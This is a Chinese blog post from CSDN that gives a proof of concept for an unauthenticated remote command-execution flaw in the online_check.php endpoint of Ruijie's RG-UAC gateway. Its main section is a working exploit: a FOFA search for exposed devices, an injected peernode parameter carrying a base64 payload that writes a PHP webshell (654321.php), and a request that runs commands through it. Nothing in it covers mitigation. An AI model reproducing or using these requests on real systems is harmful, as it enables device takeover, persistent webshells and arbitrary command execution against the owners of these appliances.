【锐捷Ruijie-UAC online_check.php 未授权远程代码命令执行漏洞】【漏洞复现】【漏洞poc】

已于 2024-03-06 13:05:32 修改
阅读量306 收藏 3
点赞数 5
分类专栏: 网络空间安全交流 文章标签: php 开发语言 网络安全 网络攻击模型
于 2024-03-06 12:44:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43977052/article/details/136502236
版权

【锐捷Ruijie-UAC online_check.php 未授权远程代码命令执行漏洞】【漏洞复现】【漏洞poc】

1. 介绍

锐捷RG-UAC统一上网行为管理审计系统是星网锐捷网络有限公司自主研发的上网行为管理与审计产品。该系统可以部署在网络的关键节点上,通过路由、透明、旁路或混合模式,对数据进行2-7层的全面检查和分析。它深度识别、管控和审计数百种常见的应用,包括IM聊天软件、P2P下载软件、炒股软件、网络游戏应用、流媒体在线视频、移动应用、网络存储等。

**

2. 网络资产搜索

**

fofa:title="RG-UAC登录页面"

在这里插入图片描述

**

3. 存在漏洞的位置

**

GET /view/vpn/autovpn/online_check.php HTTP/1.1

4. poc

payload:GET /view/vpn/autovpn/online_check.php?peernode=%20|%20`echo%20PD9waHAgcGhwaW5mbygpOw==%20|%20base64%20-d%20%3E%20test.php`

**

5. 利用流程

**

#GET 第一步
https://目标ip/view/vpn/autovpn/online_check.php #返回 code 200 代表漏洞存在


#GET 第二步
https://目标ip/view/vpn/autovpn/online_check.php?peernode=%20|%20`echo%20JTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI0X1JFUVVFU1QlNUIlMjd4eDAweHglMjclNUQlMjklM0I=%20|%20base64%20-d%20%3E%20654321.php` #返回 code 200 代表已写入成功



#GET 第三步
https://目标ip/view/vpn/autovpn/654321.php?xx00xx=id #执行命令
0山高水长
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
锐捷RG-UAC统一上网行为管理审计系统信息泄漏漏洞
xiaokp7的博客
09-13 338
锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台。
漏洞锐捷Ruijie-UAC online_check.php 命令注入漏洞
qq_67810151的博客
03-05 443
锐捷RG-UAC统一上网行为管理审计系统存在命令注入漏洞授权的攻击者可以通过该漏洞执行任意代码,控制服务器。
广州大学锐捷认证协议安全性研究
┌LiHoo┐
03-05 3425
摘要: 本文通过分析802.1X协议,发其存在离线字典攻击漏洞。同时对广州大学锐捷认证协议的具体实进行黑箱测试后,找到了同一个子网的机器和饶过认证进行通信的方法。 关键字:802.1X,锐捷,离线字典攻击   Research on Ruijie Authentication Protocol in Guangzhou University Abstract: This
锐捷Ruijie-UAC online_check.php 命令注入漏洞(含批量验证poc
weixin_43567873的博客
04-03 171
锐捷Ruijie-UAC online_check.php 命令注入漏洞(含批量验证poc
锐捷RG-UAC应用管理网关 online_check.php存在命令注入
weixin_43567873的博客
03-08 550
锐捷RG-UAC应用管理网关 online_check.php存在命令注入
锐捷Ruijie-UAC online_check(1),2024年最新网络安全面试题
最新发布
m0_58846287的博客
04-21 555
锐捷RG-UAC系列应用管理网关是锐捷自主研发的应用管理产品。锐捷RG-UAC应用管理网关 online_check.php存在命令注入漏洞经身份认证的攻击者可执行任意命令控制服务器权限。
锐捷RG-UAC应用网关 前台RCE漏洞
0xSec
12-02 1311
锐捷RG-UAC应用管理网关 nmc_sync.php 接口处存在命令执行漏洞经身份认证的攻击者可执行任意命令控制服务器权限。
锐捷RG-UAC 账户硬编码漏洞批量检测exp
06-17
-u 指定单个url -l 指定url文件 fofa搜索 title="RG-UAC登录页面" && body="admin",获取相关资产后保存到txt文件,然后使用此脚本批量检测
锐捷RG-MTFi-M520车载Wi-FI 32MB编程器固件RG- MTF1-M520-v1.1. bin-网管
06-12
锐捷RG-MTFi-M520车载Wi-Fi固件。锐捷RG-MTFi-M520 32MB编程器固件,固件版本是16WiFi的
MTFI_3.0(1)B3_MTFI-M520-RLIF_04230718_install.bin
12-22
锐捷RG-MTFi-M520车载Wi-Fi固件。锐捷RG-MTFi-M520固件版本MTFI_3.0(1)B3_MTFI-M520-RLIF_04230718
RT-AC1200HP-GPIO-12-JI3-128M_3.4.3.9-099.trx
09-03
极路由3老毛子固件,亲测有用,带广告屏蔽功能,锐捷认证功能等等
libpcap_1.8.1-1_mipsel_24kc.ipk
01-22
mentohust_0.3.1-2_mipsel_24kc.ipk mentohust的依赖
星网锐捷HG-EP800-Telnet.zip
06-25
打开星网锐捷Ep800-s光猫telnet工具,添加了关telnet的工具,也安全一些。 使用方法: HG-EP800-TelnetEnable.exe:打开telnet工具 HG-EP800-TelnetDisable.exe:关闭telnet工具 打开Telnet:电脑通过网线连接光猫...
锐捷RCNP-RS-C8311-V5.0.xlsx
05-08
锐捷RCNP-RS-C8311-V5.0.xlsx
Goby 最全最新POC共计448个
08-30
CNVD-2021-00876、Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109、XXL-JOB 任务调度中心 后台默认弱口令、帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757、锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞、蜂网...
校园网认证客户端_锐捷_Supplicant_For_Windows_V6.82.zip
08-30
校园网认证客户端_锐捷_Supplicant_For_Windows_V6.82.zip
mentohust_0.3.1-1_mips_24kc.ipk
04-18
已经交叉编译好的mentohust 0.3.1的ipk包,适用于OpenWrt路由器的锐捷认证(802.1x)。 Package architecture:mips_24kc 自己在Target:ar71xx-ath79,Device:Netgear WNDR3700v2(WNDR3800)上测试通过,其他类似...
锐捷eg网关与nbr路由器命令执行漏洞
07-29
锐捷EG网关和NBR路由器是锐捷公司生产的网络设备,近期被曝出存在命令执行漏洞。 该漏洞的存在使得攻击者能够通过特制的网络请求执行恶意命令,从而导致系统被入侵和控制。其中锐捷EG网关的漏洞编号为CVE-2017-17408,而NBR路由器的漏洞编号为CVE-2017-17409。 攻击者可以通过发送恶意的HTTP请求或者其他网络请求来利用这些漏洞。一旦成功利用,攻击者可以执行任意命令并获取系统权限。这些命令可能包括修改配置、获取敏感信息或者部署其他恶意软件等。 这些漏洞的存在给网络安全带来了潜在的威胁。攻击者可以通过利用这些漏洞对网络设备进行攻击,窃取敏感信息、破坏网络服务或者入侵其他网络设备。 为了解决这些漏洞的问题,锐捷公司已经发布了相应的安全补丁,并且建议用户尽快升级相关设备的固件版本。同时,用户还应该加强网络设备的安全配置,限制对设备的网络访问、设置强密码、及时备份设备配置等。 作为网络设备的用户,我们也应当关注设备厂商的安全公告,定期检查更新并安装相关补丁。此外,加强网络设备的监控和日志记录,及时发和防范异常行为也是非常重要的。 总之,锐捷EG网关与NBR路由器命令执行漏洞的曝光提醒我们网络安全问题的重要性,需要及时采取相应的措施来保护网络设备和数据的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值